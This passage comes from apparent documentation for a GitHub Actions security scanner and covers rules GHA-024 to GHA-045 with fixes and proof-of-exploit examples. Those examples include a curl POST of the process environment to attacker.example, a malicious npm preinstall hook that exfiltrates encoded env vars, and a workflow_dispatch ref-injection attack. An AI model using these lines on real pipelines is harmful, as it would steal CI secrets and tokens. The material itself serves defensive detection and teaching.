How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where and how it was built. Consumers can then verify the build happened on a trusted runner, from a specific source commit, with known parameters. Without provenance, a leaked signing key alone is enough to forge a trusted artifact; with it, an attacker must also compromise the build environment. You need both for the SLSA L3 non-falsifiability guarantee.

Recommendation. Call slsa-framework/slsa-github-generator or actions/attest-build-provenance after the build step to emit an in-toto attestation alongside the artifact. cosign sign alone (covered by GHA-006) signs the artifact but doesn't record how it was built. SLSA Build L3 requires the provenance statement.
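
A job fragment showing the actions/attest-build-provenance shape; the build command, artifact path, and pinned SHAs are illustrative:

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      id-token: write       # lets the job request the OIDC token that signs the attestation
      attestations: write   # lets the job store the attestation with the repo
      contents: read
    steps:
      - uses: actions/checkout@<pinned-sha>
      - run: make build     # hypothetical: produces dist/app
      - uses: actions/attest-build-provenance@<pinned-sha>
        with:
          subject-path: dist/app
```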

Source: GHA-024 in the GitHub Actions provider.

GHA-025: Reusable workflow not pinned to commit SHA HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. A reusable workflow runs with the caller's GITHUB_TOKEN and secrets by default. If uses: org/repo/.github/workflows/release.yml@v1 resolves to an attacker-modified commit, their code executes with your repository's permissions. This is the same threat model as unpinned step actions (GHA-001) but over a different uses: surface.

Recommendation. Pin every jobs.<id>.uses: reference to a 40-char commit SHA (owner/repo/.github/workflows/foo.yml@<sha>). Tag refs (@v1, @main) can be silently repointed by whoever controls the callee repository.
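
A sketch of the pinned call shape, with a hypothetical org/repo and a placeholder standing in for a real 40-character commit SHA:

```yaml
jobs:
  release:
    # A tag ref (@v1, @main) can be repointed by whoever controls the callee
    # repo; a 40-char commit SHA cannot. Keep the human-readable tag as a comment.
    uses: octo-org/build-workflows/.github/workflows/release.yml@<40-char-sha>  # v1.4.2
```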

Source: GHA-025 in the GitHub Actions provider.

GHA-026: Container job disables isolation via options: HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. GitHub-hosted runners execute container: jobs inside a Docker container the runner itself manages, normally a hardened, network-namespaced sandbox. options: is a free-text passthrough to docker run; a flag that breaks the sandbox (shares host network/PID, runs privileged, maps the Docker socket) turns the job into an RCE on the runner VM.

Recommendation. Remove --network host, --privileged, --cap-add, --user 0/--user root, --pid host, --ipc host, and host -v bind-mounts from container.options and services.*.options. If a build genuinely needs one of these, move it to a dedicated self-hosted pool with branch protection so the flag doesn't reach PR runs.
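
A contrasting safe shape, assuming a hypothetical node:20 build image. Resource-tuning flags are fine to pass through options:; isolation-breaking flags are what the rule targets:

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    container:
      image: node:20
      # Benign tuning only: no --privileged, no --network/--pid/--ipc host,
      # no docker.sock bind-mount, no --user 0.
      options: --cpus 2 --memory 4g
    steps:
      - run: npm ci && npm test
```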

Source: GHA-026 in the GitHub Actions provider.

GHA-027: Workflow contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Distinct from the hygiene checks. GHA-016 flags curl | bash as a risky default; this rule fires only on concrete indicators: reverse shells, base64-decoded execution, known miner binaries or pool URLs, exfil-channel domains, credential-dump pipes, and history-erasure commands. Categories reported: obfuscated-exec, reverse-shell, crypto-miner, exfil-channel, credential-exfil, audit-erasure.

Recommendation. Treat this as a potential pipeline compromise. Inspect the matching step(s), identify the author and the PR that introduced them, rotate any credentials the workflow has access to, and audit CloudTrail/AuditLogs for exfil. If the match is a legitimate red-team exercise, whitelist via .pipelinecheckignore with an expires: date, never a permanent suppression.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise workflows legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production workflow still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: GHA-027 in the GitHub Actions provider.

GHA-028: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. eval, sh -c "$X", and `$X` all re-parse the variable's value as shell syntax. If the value contains ;, &&, |, backticks, or $(), those metacharacters execute. Even when the variable source looks controlled today, relocating the script or adding a new caller can silently expose it to untrusted input.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec of variables with direct command invocation. If the command really must be dynamic, pass arguments as array members ("${ARGS[@]}") or validate the input against an allow-list before invocation.
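
The array form can be sketched in plain bash. The metacharacters stay literal data because each array element is passed as a single argv entry and never re-parsed; the input string here is a made-up example:

```shell
#!/usr/bin/env bash
set -euo pipefail

# Attacker-ish input: contains a ; that eval or sh -c would execute.
USER_INPUT='hello; echo pwned'

# Unsafe (would run `echo pwned` as a second command):
#   eval "printf '%s\n' $USER_INPUT"

# Safe: build argv as an array; "$USER_INPUT" expands to exactly ONE argument.
ARGS=(printf '%s\n' "$USER_INPUT")
"${ARGS[@]}"    # prints the string verbatim, semicolon and all
```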

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool> <literal-args>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal; only its output is eval'd. The rule only fires when the substituted command references a variable.

Source: GHA-028 in the GitHub Actions provider.

GHA-029: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Package installs that pull from git+… without a pinned commit, from a local path (./dir, file:…, absolute paths), or from a direct tarball URL are invisible to the normal lockfile integrity controls. A moving branch head, a sibling checkout the build assumes exists, or a tarball whose hash isn't verified all give an attacker who controls any of those surfaces the ability to substitute code into the build.

Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to an internal registry instead of installing from a filesystem path or tarball URL.
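
The pinned shape as a workflow fragment; the org/repo names are hypothetical and the SHA is a placeholder for a real commit hash:

```yaml
  # Branch head: whoever controls the upstream repo controls your build.
  # - run: pip install "git+https://github.com/acme/libfoo.git@main"

  # Commit-pinned: immutable regardless of upstream branch or tag moves.
  - run: pip install "git+https://github.com/acme/libfoo.git@<40-char-sha>"
```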

Source: GHA-029 in the GitHub Actions provider.

GHA-030: OIDC token requested without environment-protected job HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008. IAM-008 verifies the AWS-side trust policy pins audience + subject; this rule verifies the GitHub-side workflow can't request the token from any branch without a deployment gate. A misconfiguration on either side defeats the OIDC story.

Recommendation. Bind every job that exchanges the GHA OIDC token for cloud credentials to a protected environment: (e.g. environment: production). Environment protections layer in branch restrictions, required reviewers, and deployment windows that the IdP-side trust policy cannot enforce alone.
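
A sketch of the gated shape, with an illustrative AWS role ARN and action refs to be pinned per GHA-001:

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    environment: production   # reviewers / branch rules gate the job first
    permissions:
      id-token: write         # OIDC token is only issued inside the gated job
      contents: read
    steps:
      - uses: aws-actions/configure-aws-credentials@<pinned-sha>
        with:
          role-to-assume: arn:aws:iam::123456789012:role/deploy   # hypothetical
          aws-region: us-east-1
```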

Source: GHA-030 in the GitHub Actions provider.

GHA-031: Workflow uses retired set-output / save-state command HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GitHub deprecated ::set-output:: and ::save-state:: in October 2022 because they read from the runner's stdout as a control channel. Any tool whose output happens to contain ::set-output… (a CI job's own diagnostic, a downloaded log, an upstream test framework) silently sets a step output. The replacement workflow commands ($GITHUB_OUTPUT / $GITHUB_STATE files) close that injection channel. Workflows still using the retired commands also depend on a deprecation timer that GitHub has extended several times. They will eventually break.

Recommendation. Replace echo "::set-output name=X::$VALUE" with echo "X=$VALUE" >> "$GITHUB_OUTPUT" and echo "::save-state name=X::$VALUE" with echo "X=$VALUE" >> "$GITHUB_STATE". The old commands stream through the runner's stdout, which lets any log line that happens to start with :: inject into the command channel. The file-redirect forms write to a private file the runner reads after the step exits, no log-line interleaving, no injection.

Source: GHA-031 in the GitHub Actions provider.

GHA-032: run: invokes local script on untrusted-trigger workflow CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GHA-010 flags uses: ./action, the action form of the same threat. This rule extends to direct shell invocation: run: ./scripts/setup.sh / run: bash scripts/setup.sh / run: python tools/build.py resolve against the checked-out workspace, which on pull_request_target / workflow_run is PR-controlled. The attacker ships an edited script and gets a default-branch-privileged shell.

Recommendation. Either don't run the script under an untrusted trigger, or split the workflow: keep the privileged work on the default branch (push / release triggers, no PR fork content), and run untrusted-trigger steps in a separate workflow with no secrets and a minimal GITHUB_TOKEN scope. Pinning the script via uses: org/repo@<sha> from a separate trusted repo is the canonical fix.

Source: GHA-032 in the GitHub Actions provider.

GHA-033: Secret value echoed / printed in a run: block CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Two distinct shapes are flagged: (1) printing a secret context expression directly, e.g. echo "${{ secrets.X }}" or cat <<<${{ secrets.X }}; (2) printing an env var whose value comes from a secret, when the surrounding step's env: declares it as X: ${{ secrets.X }}. The first is the obvious foot-gun; the second is the indirect form that slips past lint passes that only scan for ${{ secrets...}} literals.

Recommendation. Don't print secret values from a script. GitHub's log redaction is a best-effort string match. It doesn't catch base64 / urlencoded / partial substrings, and any caller that retrieves the raw log via the API gets the unredacted stream. If you need to confirm the secret exists, log a boolean ([ -n "$X" ] && echo set || echo unset) or a fingerprint (echo "$X" | sha256sum | head -c8), never the value itself.
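
The two safe logging patterns from the recommendation, sketched in bash with a stand-in value for the secret:

```shell
#!/usr/bin/env bash
set -euo pipefail
X="hunter2"   # stand-in for a secret-sourced env var

# Existence check: logs only set/unset, never the value.
[ -n "${X:-}" ] && echo "X is set" || echo "X is unset"

# Fingerprint: 8 hex chars are enough to compare across runs,
# useless for recovering the secret itself.
printf '%s' "$X" | sha256sum | awk '{print substr($1, 1, 8)}'
```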

Source: GHA-033 in the GitHub Actions provider.

GHA-034: Reusable workflow called with secrets: inherit MEDIUM 🔧 fix

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Fires on a jobs.<id>.uses: ... reference whose sibling secrets: value is the literal string inherit. This is distinct from GHA-025 (which gates on the pin of the called workflow): inheritance is a problem even when the call is SHA-pinned, because the surface a compromised callee sees is every caller secret instead of just the named ones. Explicit lists also document the contract: reviewers see exactly which secrets cross the workflow boundary.

Recommendation. Replace secrets: inherit with an explicit list of just the secrets the called workflow actually needs (secrets: { NPM_TOKEN: ${{ secrets.NPM_TOKEN }} }). inherit passes every secret the caller can see, including ones the downstream workflow has no business reading. A compromised or buggy reusable workflow can then exfiltrate credentials the caller never intended to share.
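
The explicit-list shape, with a hypothetical org/repo and a placeholder ref:

```yaml
jobs:
  publish:
    uses: octo-org/workflows/.github/workflows/publish.yml@<pinned-sha>
    secrets:
      # Explicit contract: only the one secret the callee needs crosses
      # the workflow boundary; everything else stays with the caller.
      NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
```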

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Single-tenant repos that share their entire secrets set with every reusable workflow by policy. Rare in practice, explicit lists make the secret flow visible and don't add much typing. Suppress with .pipelinecheckignore and a rationale rather than disabling the rule everywhere.

Source: GHA-034 in the GitHub Actions provider.

GHA-035: github-script step interpolates untrusted context HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GHA-003 covers run: blocks where shell expansion is the injection surface. actions/github-script@<ref> runs the script: input as Node.js inside an authenticated Octokit context, same threat model, different language. The rule fires when script: (or the legacy previews: companion for inline JS) contains a ${{ github.event.* }}, ${{ inputs.* }}, ${{ github.head_ref }}, ${{ github.ref_name }}, or any other untrusted context expression, exactly the same catalog GHA-003 uses.

Recommendation. Pass attacker-controllable values through env: and read them inside the script via process.env.X instead of interpolating ${{ ... }} directly into the script body. GitHub expands the expression before the JavaScript engine parses the source, so backticks, quotes, and ${...} characters in the source field break out of the surrounding string and execute as JavaScript with the workflow's GITHUB_TOKEN in scope.
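
A sketch of the env-indirection pattern; the action ref is a placeholder and the PR-title example is illustrative:

```yaml
  - uses: actions/github-script@<pinned-sha>   # pin per GHA-001
    env:
      PR_TITLE: ${{ github.event.pull_request.title }}  # expanded as data, not source
    with:
      script: |
        // process.env.PR_TITLE is an opaque string to the JS parser;
        // backticks, quotes, or ${} in the title can't break out of anything.
        const title = process.env.PR_TITLE;
        core.info(`title length: ${title.length}`);
```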

Known false positives.

  • Scripts that interpolate ${{ steps.*.outputs.* }} from a trusted upstream step are out of scope (the rule only matches the curated untrusted-context regex). If you intentionally rely on a non-curated context, suppress with a brief .pipelinecheckignore rationale.

Source: GHA-035 in the GitHub Actions provider.

GHA-036: runs-on interpolates untrusted context HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. GHA-012 catches self-hosted runners that aren't ephemeral; this rule catches the upstream targeting choice. When runs-on is computed from an untrusted expression, the caller picks where the workflow runs, including any self-hosted label the org owns. A reusable workflow that declares runs-on: ${{ inputs.runner }} lets a downstream caller route the job onto the production-deploy fleet (or any other privileged label) and execute arbitrary code with the privileges that fleet inherits. The same surface exists via workflow_dispatch inputs and any ${{ github.event.* }} field that an attacker can populate. The rule walks all three runs-on shapes (string scalar, list of labels, and the long-form { group, labels } dict) and matches the same untrusted-context regex GHA-003 / GHA-035 use.

Recommendation. Hard-code runs-on: to a specific runner label or list of labels. If the choice has to be parameterised across callers, validate the input against an allowlist of known-good labels before the job runs (a small if: guard at job level), and never accept ${{ inputs.* }} or any ${{ github.event.* }} field as the runs-on value directly.
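
The job-level allowlist guard from the recommendation can be sketched like this for a reusable workflow; the label list is illustrative:

```yaml
on:
  workflow_call:
    inputs:
      runner:
        type: string
        default: ubuntu-latest

jobs:
  build:
    # Refuse to schedule the job at all unless the caller names a vetted label.
    if: contains(fromJSON('["ubuntu-latest", "buildpool-4core"]'), inputs.runner)
    runs-on: ${{ inputs.runner }}
    steps:
      - run: echo "running on an allowlisted label"
```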

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Workflows that intentionally select runners by environment via a vetted matrix (runs-on: ${{ matrix.os }} where matrix.os is a hard-coded list inside the workflow) are out of scope, the matrix values are author-controlled, not caller-controlled. The rule only matches the catalog of untrusted contexts (inputs.*, github.event.*, github.head_ref, …); matrix.* and env.* references are intentionally not flagged.

Source: GHA-036 in the GitHub Actions provider.

GHA-037: actions/checkout persists GITHUB_TOKEN into .git/config HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detection fires on any step whose uses: starts with actions/checkout@ and whose with: block either omits persist-credentials (the unsafe default) or sets it to true explicitly.

This is the failure pattern Zizmor calls Artipacked and the StepSecurity / harden-runner audit set tracks as persist-credentials-default. Real-world exploit chains (the ultralytics 2024 RCE, multiple Mend / Snyk advisories) exploit exactly this primitive: a first checkout step persists the token, a later run: step (often a build script the attacker can influence via PR contents) reads .git/config and ships the token out.

Sister rule: GHA-019 catches the explicit echo $GITHUB_TOKEN > file shape; GHA-037 catches the implicit checkout-default that doesn't go through a run: line at all.

Recommendation. Set persist-credentials: false on every actions/checkout step that doesn't need to push back to the repo. The default in v3 / v4 is true, which writes the GITHUB_TOKEN into .git/config as an http.https://github.com/.extraheader line. Any subsequent run: step in the same job can read it with git config --get http.https://github.com/.extraheader and exfiltrate the token to a remote endpoint, even if that step's own scope is read-only. If the workflow genuinely needs to push (release publishing, doc-site deploys), do the push as the very next step and immediately follow with a checkout that sets persist-credentials: false so the token doesn't leak into later, less-trusted steps.
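
The remediation is one with: line per checkout step; the action ref is a placeholder to be pinned per GHA-001:

```yaml
  - uses: actions/checkout@<pinned-sha>
    with:
      persist-credentials: false   # token never lands in .git/config
```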

Known false positives.

  • Workflows that genuinely need persist-credentials: true to push back to the repo (a release-tag bot, a docs-deploy job, stefanzweifel/git-auto-commit-action) shouldn't suppress this rule globally; instead, scope persist-credentials: true to a named step, then run the push immediately, then use a fresh actions/checkout with persist-credentials: false so the token doesn't leak into later steps. Suppress on the specific step name only when the scoped pattern is in place.

Source: GHA-037 in the GitHub Actions provider.

GHA-038: Workflow re-enables retired ::set-env / ::add-path commands CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Detection fires when ACTIONS_ALLOW_UNSECURE_COMMANDS is set to any truthy value at the workflow env: level, the job env: level, or any step's env: block. Accepted truthy spellings: true / 1 / yes / on (including quoted forms like "true" and case-insensitive variants like YES / On).

Sister rule GHA-031 catches direct uses of ::set-output:: / ::save-state:: in step scripts. GHA-038 catches the explicit re-enable flag, which is the strictly worse case: it implicitly accepts every ::set-env:: / ::add-path:: line that lands on the runner's stdout from any tool the step invokes, not just the workflow author's own echo commands. A downloaded build log, a container's startup banner, an upstream test runner's output, all become injection vectors.

Recommendation. Drop the ACTIONS_ALLOW_UNSECURE_COMMANDS env definition entirely, then migrate any leftover ::set-env:: / ::add-path:: workflow commands to the file-redirect form (echo "X=$VAL" >> "$GITHUB_ENV" and echo "$DIR" >> "$GITHUB_PATH"). GitHub disabled the legacy commands in 2020 specifically because they share the runner's stdout as a control channel: any log line starting with :: could inject environment variables, prepend to PATH, or set step outputs. Setting the override flag back to true re-opens that injection channel for the entire workflow scope.

Known false positives.

  • Some legacy actions (last-updated pre-2020) still emit ::set-env:: lines and rely on the override to be set. Replace the action rather than suppressing this rule, the security exposure outweighs the cost of an alternative action.

Source: GHA-038 in the GitHub Actions provider.

GHA-039: services / container credentials embedded as literal in workflow CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. GitHub Actions accepts a credentials: map on both the job-level container: block (the runner image) and on each services.<name>: entry (sidecar containers). The map is the documented way to pull a private image from a registry that requires auth, and it expects ${{ secrets.* }} references for both fields.

GHA-008 scans the workflow for credential patterns (AWS access keys, JWTs, Slack tokens, etc.) but doesn't trip on a plain password like hunter2 or a registry username like ci-deploy-bot. GHA-039 catches them by position: any literal value in a credentials.username / credentials.password field is by definition a leaked credential, regardless of its shape. Closes parity with Zizmor's hardcoded-container-credentials rule.

Recommendation. Move every services.<name>.credentials.username / credentials.password value (and the same field on a job-level container: block) out of the workflow YAML and into a repository or environment secret. Reference the secret via ${{ secrets.NAME }} from the same credentials block. Anything written as a literal is permanently visible in every fork of the repo, every build log that prints the runner's start banner, and every cached job summary, so the credential must be treated as compromised on the spot. The fix is the rotation, plus the secret reference, plus a check that no other workflow keeps the literal pattern.
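
The secret-referencing shape on both surfaces the rule inspects; registry, image names, and secret names are hypothetical:

```yaml
jobs:
  test:
    runs-on: ubuntu-latest
    container:
      image: registry.internal.example/ci/builder:2024.1
      credentials:
        username: ${{ secrets.REGISTRY_USER }}
        password: ${{ secrets.REGISTRY_TOKEN }}
    services:
      db:
        image: registry.internal.example/ci/postgres:16
        credentials:
          username: ${{ secrets.REGISTRY_USER }}
          password: ${{ secrets.REGISTRY_TOKEN }}
```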

Known false positives.

  • Workflows that legitimately use a public anonymous registry mirror occasionally hardcode username: anonymous / password: "" for clarity. Both shapes are filtered out automatically (empty / whitespace-only values, plus the literal anonymous username), but if your fixture uses another sentinel for anonymous access, suppress the specific job/service in the ignore-file rather than the rule globally.

Source: GHA-039 in the GitHub Actions provider.

GHA-040: Action reference matches a known-compromised SHA or tag CRITICAL

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks every workflow's steps[].uses: and jobs.<id>.uses: references against the curated compromised-action registry in pipeline_check.core.checks.github._compromised_actions. Match is case-insensitive on owner / repo and exact on the ref value (commit SHA or tag name). Registry is deliberately small and append-only — refresh by PR with the citing advisory in the commit message; no fetch-from-network registry to avoid taking on a telemetry surface.

Recommendation. Rotate every secret that may have been reachable to a workflow run that hit the compromised reference, then update the uses: reference to a known-clean SHA published by the upstream maintainer post-incident (usually announced in the advisory body). Audit CI logs for the affected window for any sign that the malicious payload ran against this repo.

Known false positives.

  • The registry covers only public, advisory-confirmed compromises. Pre-disclosure compromises and yet-unpublished maintainer-account takeovers do not land until the citing CVE / GHSA exists. Pair with GHA-001 (SHA pinning) and GHA-025 (tag-rewrite detection) for the prevention angle.

Seen in the wild.

  • tj-actions/changed-files compromise (CVE-2025-30066, March 2025): the canonical case the registry was built for. Roughly 23,000 tag-pinned repos shipped CI secrets to an exfiltration endpoint over a ~24-hour window before GitHub blocked the malicious commits.
  • reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week as tj-actions; smaller blast radius but identical mechanism. Tag-pinned consumers were affected; SHA-pinned consumers who happened to match the malicious commit were also affected.

Proof of exploit.

Vulnerable: pinned to a SHA the attacker landed under @v45. Same applies to tag pins that resolved to the malicious commit during the compromise window:

  • uses: tj-actions/changed-files@v45 # WAS pointing at the bad commit

Attack: the action body exfiltrated CI secrets to a Memdump-style endpoint:

  # curl -X POST https://attacker.example/exfil \
  #   -d "$(cat /proc/self/environ)"

Every workflow run that hit one of those refs over the ~24-hour exposure window leaked the entire env block, including ${{ secrets.* }} and GITHUB_TOKEN.

Safe: pin to the post-incident clean SHA the maintainer published in the advisory.

Source: GHA-040 in the GitHub Actions provider.

GHA-041: Action upstream repo has a single contributor MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reads the contributor count from ctx.action_metadata[owner/repo].contributor_count (populated by the --resolve-remote path; the GitHub REST /contributors endpoint, capped at two entries — the rule only cares about == 1). When the fetch failed or the flag is off, the rule passes silently. Forks and archived repos that ALSO have a single contributor fire the rule; the fork / archived state is part of the same supply-chain risk story.

Recommendation. Audit the action repo's contributor list. If the repo genuinely has one maintainer, pin to a vendored fork under your org's control (so a future compromise on the upstream doesn't reach your build runtime) or move to a first-party action covering the same surface. The single-maintainer pattern is what gave the tj-actions / reviewdog one-day compromises such a wide blast radius.

Known false positives.

  • Some well-maintained single-author actions (high-quality personal-account repos that the maintainer simply hasn't open-sourced governance for) are not actually compromised. Suppress via ignore-file when a security review has confirmed the maintainer's identity and 2FA posture.

Seen in the wild.

  • tj-actions / reviewdog March 2025 compromises (CVE-2025-30066 / CVE-2025-30154): both upstream repos had a single primary contributor at the time of compromise. The single-maintainer pattern was central to the blast radius (no second pair of eyes on the malicious commit, no auto-rollback when the tag move landed).

Source: GHA-041 in the GitHub Actions provider.

GHA-042: Action upstream repo is newly created MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reads created_at from ctx.action_metadata[owner/repo] (populated by the --resolve-remote path). Fires when the repo's age in days is below MIN_AGE_DAYS (90). Without the opt-in flag the rule passes silently with a nudge.

Recommendation. Verify the action repo is the real upstream and not a typosquat. Compare the spelling and owner against the intended action (actions/checkout vs actoins/checkout); check the repo description, stars, and prior releases. If the action is genuinely new but trusted, suppress via ignore-file with a dated note; the suppression decays naturally as the repo ages past the 90-day threshold.

Known false positives.

  • Newly-released first-party actions from a trusted org (say, a freshly-launched actions/foo rolled out by GitHub itself) fire while they're still young. Suppress via ignore-file with a dated note; the entry expires naturally once the repo crosses the age threshold.

Seen in the wild.

  • GitGuardian / StepSecurity typosquat reports (2023-2024) document several action-naming impersonations that appeared as newly-registered repos and reached production CI before the legitimate owner was notified.

Source: GHA-042 in the GitHub Actions provider.

GHA-043: Low-star action runs with sensitive permissions HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-5 Insufficient PBAC.

How this is detected. Reads stargazers_count from ctx.action_metadata[owner/repo] and the effective permissions: block (job-level wins; falls back to workflow-top-level; falls back to the caller's inherited block for resolved reusable workflows). Fires when stars < MAX_STARS (25) AND any of 'contents', 'packages', 'id-token', 'actions', 'deployments' is set to write on the calling job. permissions: write-all is treated as all scopes set to write.

Recommendation. Either narrow the calling job's permissions: to the minimum the action actually needs (drop contents: write / id-token: write / packages: write / actions: write / deployments: write unless the action's documented surface requires them), or replace the action with a community-reviewed alternative. The rule fires on the COMBINATION of low community review and elevated permissions; either side alone is fine.

Known false positives.

  • Internal first-party actions hosted in a private org repo legitimately have low public star counts; their threat model is different and the rule does not distinguish internal from third-party. Suppress via ignore-file when the action is in-org and trusted.

Seen in the wild.

  • GitGuardian 2023 supply-chain audit: a handful of low-popularity actions with contents: write were weaponized via single-PR maintainer-impersonation compromises; the elevated permission was the privilege amplifier that let the attacker push code back to the victim's default branch on the same workflow run.

Source: GHA-043 in the GitHub Actions provider.

GHA-044: Build tool runs lifecycle scripts on untrusted-trigger workflow HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Package managers and build tools execute code by design. npm install runs preinstall / install / postinstall from the PR's package.json; pip install . runs the PR's setup.py; make runs the PR's Makefile; mvn / gradle load plugins declared in the PR's pom.xml / build.gradle; cargo build runs build.rs. Under pull_request_target / workflow_run, the surrounding context already has secrets and a write-scope token, so the lifecycle hook is the entire attack.

Recommendation. Don't run install / build commands under pull_request_target or workflow_run against a tree that may be PR-controlled. Split the workflow: keep the privileged work on push / release (no fork content), and run untrusted builds in a separate pull_request workflow with no secrets and a read-only GITHUB_TOKEN. If you must build PR code with secrets, do it inside a container with no network egress and a minimal filesystem, never directly on the runner.

Known false positives.

  • Workflows that pin the workspace to a trusted ref before invoking the build tool (actions/checkout with no ref: override on pull_request_target, or a fresh checkout of a default-branch SHA) aren't actually exposed. The rule fires on the build-tool invocation alone; suppress with a .pipelinecheckignore rationale when the workspace is provably clean.

Seen in the wild.

  • Trail of Bits Public PPE write-up (2022): demonstrated the primitive against pull_request_target workflows that ran npm install after checking out PR content. The PR-supplied preinstall script ran with the base repo's secrets in scope. Same shape with pip install -e . (setup.py) and make (Makefile).
  • Cycode / Legit Security Poisoned Pipeline Execution research (2022-2023) catalogued dozens of OSS repos where a privileged-trigger workflow's build step executed PR-controlled config: setup.py's cmdclass, build.gradle's init.gradle, pom.xml's <build><plugins>. The fix pattern is always: don't build untrusted code with secrets in scope.

Proof of exploit.

Vulnerable: pull_request_target + npm install.

name: pr-build
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm install   # executes package.json scripts

Attack: PR ships a tampered package.json with:

  "scripts": {
    "preinstall": "curl -X POST https://attacker.example/x -d \"$(env | base64 -w0)\""
  }

npm install runs preinstall before resolving any dependency, so the exfil fires the moment the workflow starts. Same shape with pip install -e . (runs setup.py), make (runs Makefile), mvn (runs pom.xml plugins), gradle (runs init scripts), cargo build (runs build.rs).

Safe: split the workflow. Privileged labeler runs on pull_request_target with secrets but never installs the PR. The build runs on pull_request with no secrets:

name: build
on: { pull_request: {} }
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@
      - run: npm install   # no secrets in scope

Source: GHA-044 in the GitHub Actions provider.

GHA-045: Caller-controlled ref input feeds actions/checkout HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. workflow_dispatch / workflow_call inputs land in ${{ inputs.<name> }}. Feeding that directly into the ref: of actions/checkout means the caller picks which commit runs in this workflow's privileged context (secrets, GITHUB_TOKEN, environment approvals already satisfied). The callee can't tell whether the ref points at a vetted branch, a private fork's tip, or an attacker-controlled SHA. The rule fires on ref: values whose expression resolves to an inputs.* reference, walking any ${{ ... }} expression that names an input field.

Recommendation. Validate the ref input against an allow-list (a regex for refs/heads/release-*, an explicit set of permitted tags, or a 40-char SHA match) BEFORE passing it to actions/checkout. If the workflow only needs to build release tags, hard-code the ref or derive it from github.event.release.tag_name (still attacker-influenced, but at least scoped to a release event). For reusable workflows, document that the callee assumes callers have already validated the ref, and pin every caller to a known list of refs.

Known false positives.

  • Reusable workflows that ARE the trust boundary (the callee is documented as the authoritative checkout entrypoint and every caller is internal / pinned by SHA) accept this shape by design. The rule still surfaces these so the author can document the contract in a .pipelinecheckignore rationale; suppress with the caller-list cite.

Seen in the wild.

  • Snyk GitHub Actions abuse via workflow_dispatch research (2023) showed reusable build workflows that accepted a ref input and checked it out without validation. An attacker with workflow_dispatch permission (commonly granted to broader sets of actors than push) pointed the checkout at a fork SHA and exfiltrated the production deploy credentials.

Proof of exploit.

Vulnerable: caller picks the ref.

name: build-release
on:
  workflow_dispatch:
    inputs:
      ref:
        description: 'Tag or branch to build'
        required: true
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@
        with:
          ref: ${{ inputs.ref }}   # caller controls
      - run: make release
        env:
          SIGNING_KEY: ${{ secrets.RELEASE_SIGNING_KEY }}

Attack: any actor with workflow_dispatch permission opens the API and dispatches with ref: refs/pull/123/head (a fork PR). The privileged workflow checks out the attacker-controlled tree and runs make release with the signing key in scope. No code review, no PR merge: one API call.

Safe: validate the ref before use.

  - name: Validate ref
    run: |
      case "$REF" in
        refs/tags/v*) ;;
        *) echo "refusing $REF"; exit 1 ;;
      esac
    env:
      REF: ${{ inputs.ref }}
  - uses: actions/checkout@<sha>
    with:
      ref: ${{ inputs.ref }}

Source: GHA-045 in the GitHub Actions provider.

GHA-046: Manual PR-head fetch on untrusted-trigger workflow CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

